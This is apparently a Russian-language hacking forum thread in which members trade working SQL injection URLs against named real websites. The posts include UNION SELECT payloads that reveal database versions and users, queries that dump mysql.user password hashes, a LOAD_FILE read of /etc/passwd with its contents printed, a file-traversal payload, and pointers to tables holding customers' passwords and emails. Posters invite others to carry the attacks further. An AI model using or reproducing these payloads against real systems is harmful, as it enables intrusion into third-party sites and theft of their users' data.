SQL Инъекции

PR 3

Database Version: 5.0.74sp1-enterprise-gpl-log
Database name: wheel015
User name: [email protected]

****************​

Нашёл интересную вещь...назвал я это самоDdos

****************​

Вот ещё

Стоит на движке typo3. Может кому будет интересно...

****************​

Тут меня особо улыбнуло

Директории можно просматривать браузером.

****************​

Database Version: 4.1.8-nt
Database name: psdp
User name: [email protected]

****************​

Database Version: 5.0.77-log
Database name: d60523336
User name: u70583365@cgihost

****************​

Database Version: 4.1.22-log
Database name: 341213_fullgospelcms
User name: [email protected]

****************​

Database Version: 4.1.22-standard-log
Database name: royalba_db
User name: [email protected]

****************​

PR 3

Database Version: 4.1.22-log
Database name: 342335_ejobscms
User name: [email protected]

****************​

Database Version: 5.0.67-community-log
Database name: cic_cicgh
User name: cic_naya@localhost

****************​

PR 6

Database Version: 4.1.22-standard-log
Database name: nabgov_nab
User name: [email protected]

****************​

PR 6
Школа исследований и аспирантуры, Университет Ганы

Database Version: 5.0.32-Debian_7etch6-log
Database name: srgs
User name: root@localhost

****************​

Database Version: 4.1.22-standard-log
Database name: pdaghan_db
User name: [email protected]

 

[PR 6]

Code:

http://www.interspaziale.it/firme/articolo.php?id=-20223+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user()))),4,5,6,7,8,9,10,11,12,13,14,15,16

4.1.10-log:internazionale:[email protected]
====================
[PR 5]

Code:

http://www.photocross.ru/gallery/index.php?c=-72+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4

5.0.51a-community:db_photocross2[email protected]
====================
[PR 4]

Code:

http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())--&scat=25

5.0.77-community:ga_news:[email protected]

Code:

http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,user,password,file_priv)+from+mysql.user--&scat=25

====================
[PR 1]

Code:

http://www.newandusedpalletracking.co.uk/article.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())

4.1.22:threejc:threejc@localhost

 

Code:

http://dance.sebastopol.ua/showalbum.php?page_code=-9%20union%20select%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6%20%20--

4.0.27-max-log:geokon10:[email protected]

 

http://www.sarafalcsrl.com/arataimobil.php?id=-46+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*


Database Version: 5.0.45-community-nt
Database name: imobile
User name: soim@localhost

 

http://www.lemmingtrail.com/t.php?id=110319+and+substring(version(),1,1)=4
----
http://www.eevolute.com/t.php?pageid=1&atid=15&id=14+and+substring(version(),1,1)=5
----
http://map.planetmedalofhonor.gamespy.com/mohaa/t.php?id=82+and+substring(version(),1,1)=4
----
http://www.climatsv.ru/t.php?id=-10+union+select+concat_ws(0x3a,version(),user(),database())
5.0.67-log:[email protected]:u50633
----
http://www.zinesters.net/board/t.php?id=66+and+substring(version(),1,1)=4/*

 

hardover_pravon:5.0.67-community:hardover_pravo@localhost

//--------------------------------------------//

bigfootinfo:5.0.67.d7-ourdelta-log:[email protected]

 

amigo-bike.ru​

Code:

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17

Code:

webadmin@localhost:amigo:5.0.32-Debian_7etch6-log

Code:

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(0x2F6574632F706173737764),8,9,10,11,12,13,14,15,16,17

Code:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false test:x:1000:1000:test,,,:/home/test:/bin/bash sshd:x:100:65534::/var/run/sshd:/bin/false bind:x:101:104::/var/cache/bind:/bin/false mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false postfix:x:104:106::/var/spool/postfix:/bin/false www-data:x:999:999:www-data:/var/www:/bin/sh avdaemon:x:1001:1001:AVP Daemon:/non/existant:/bin/false avclient:x:1002:1001:AVP Client:/non/existant:/bin/false ftp:x:1003:1003::/tmp:/bin/false kiel:x:1004:1004::/srv/kiel.ru:/bin/false mzbask:x:1005:1005::/srv/mzbask.ru:/bin/false kontrakt-plus:x:1006:1006::/srv/kontrakt-plus.ru:/bin/false universam1:x:1007:1007::/srv/universam1.ru:/bin/false tdzko:x:1008:1008::/srv/tdzko.ru:/bin/false heartsunionru:x:1009:1009::/home/heartsunionru:/bin/flase parus-anapa:x:1010:1010::/home/parus-anapa:/bin/false mailflt3:x:1011:1011:Kaspersky Anti-Spam user:/usr/local/ap-mailfilter3/run:/bin/false misha:x:1012:1012::/home/misha:/bin/sh sasha:x:1013:1013::/home/sasha:/bin/false postgrey:x:110:110::/var/lib/postgrey:/bin/false patrul880:x:1014:1014::/home/patrul880:/bin/false reklama42:x:1015:100::/home/reklama42:/bin/false pressasibiri:x:1016:1015::/home/pressasibiri:/bin/false kemgmli:x:1017:1016::/home/kemgmli:/bin/false postgres:x:1018:1018:,,,:/home/postgres:/bin/bash

Code:

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,password),8,9,10,11,12,13,14,15,16,17+from+mysql.user

scooters.moto-bike.ru​

Code:

http://www.scooters.moto-bike.ru/moto.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6/*

Code:

mataru_moto@localhost:mataru_moto:5.0.26-log

 

Code:

www.safariexpo.ru/news/?id=-1+order+by+9/*
www.garms.ru/deps.php?dep=hunt&rid=-1+order+by+2/*

mailbrush, перечитай правила - постить пароли запрещено.

 

PR 4

Database Version: 4.1.22-standard-log
Database name: 334903_vanguardcms
User name: [email protected]

Database Version: 5.0.77-community
Database name: metropol_metropolehaiti
User name: metropol_metropo@localhost

Database Version: 5.0.75-community-log
Database name: bonzouti_cohadde
User name: bonzouti_goldo@localhost

PR 4

Database Version: 5.0.81-community
Database name: wdmc_dmc
User name: wdmc_wdmc@localhost

Database Version: 5.1.35
Database name: d9992sd7549
User name: [email protected]

 

HTML:

http://shans.com.ua/?m=nr&in=212&ir=1&id=-23136+union+select+1,concat_ws(0x3a,version(),user(),database()),3--

5.0.81-log:[email protected]:shansco_shans

HTML:

http://dhp.com.ua/pers_news.php?id=-21+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8--

5.0.82:admindhp@localhost:dhp

 

CHAPEL OF THE HIGHLANDS

Code:

http://www.chapelofthehighlands.com/ecards/getnewsitem.php?newsid=1+union+select+1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5--

5.0.75-community-log*:*chapelo3_ecards*:*chapelo3_chapel@localhost*:*redhat-linux-gnu

 

Code:

http://www.solmetec.com.ve/ver_producto.php?id=229+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16++limit+1,1/*

version():4.1.22-standard
database():solmetec_bd
user():solmetec_web@localhost

 

http://www.mlauto.ru/cars.htm?carid=-27+union+select+concat_ws(0x3a,database(),version(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

Database: mlauto79
Version: 4.0.27-max-log
OS: unknown-freebsd4.7
User: [email protected]

 

gordons1_judaicashuk:5.0.75-community-log:gordons1_yarok@localhost

//-----------------------------------------------------------------//

elsyvid_elsydata:4.1.22-standard-log:[email protected]

//-----------------------------------------------------------------//

hidcorp:5.0.51a-log:[email protected]

 

http://webmuseum.mit.edu/info.php?&v=1&s=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version()),6,7,8,9,10,11,12,13,14,15+--+&type=exh&t=exhibitions
Mobius@localhost:5.0.41-community-nt
2:[email protected]:<pwd_cutted>

http://webmuseum.mit.edu/grabimg.php?wm=1&kv=-1+union+select+1,'../../grabimg.php'+--+

user.php
$addedterm = strtoupper($field) . " = '" . str_replace("'","\'",$criteria) . "'";

a\' OR EMAIL=0x61646d696e406d69742e6d6974 -- -;asdasd

 

http://www.tamm-kreiz.com/kalon/tk.php?action=fest&id=20884+and+substring(version(),1,1)=5

 

4.1.22-standard-log
[email protected]
335104_fidelitycms

 

http://edmazur.com/bots/bot.php?s=green&id=149754+and+substring(version(),1,1)=5/*
---
http://www.parkweddings.com/park.php?id=1+and+substring(version(),1,1)=4
---
http://www.sitebuildgroup.com/park.php?ID=-5+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4
4.0.27-max-log:[email protected]:sitesf
---
http://www.parkbrochures.com/park.php?id=-73+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4
5.0.67-log[email protected]arkbrochures
---
http://skateparkreview.com/park.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
4.0.27-max-log:[email protected]:spradmin

есть таблица users
с полями usernames, password
---
http://www.credonic.com/park.php?a=d&id=-17171+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11
5.0.77-COMMUNITY:CREDOMAX_CREDO@LOCALHOST:CREDOMAX_CREDONIC
есть базы: credomax_10000, credomax_2000, credomax_4000, credomax_6000, credomax_8000,
В каждой из них есть табличка: dsp_buyers , из названия понятно что там хранятся покупатели. пароли, почты, имена и так далее, там.
---
http://cityofbartlesville.com/parkcalendar-park.php?cat=1049&event=-1014+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
4.0.27-max-log[email protected]ende
---
http://www.nekropolia.pl/park.php?akcja=storyread&id=-71+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4
5.0.75-log:[email protected]:imperio_5
таблица user со всеми вытекающими

 

таблицу к админке не подобрал((
Если получиться - пишите в лс.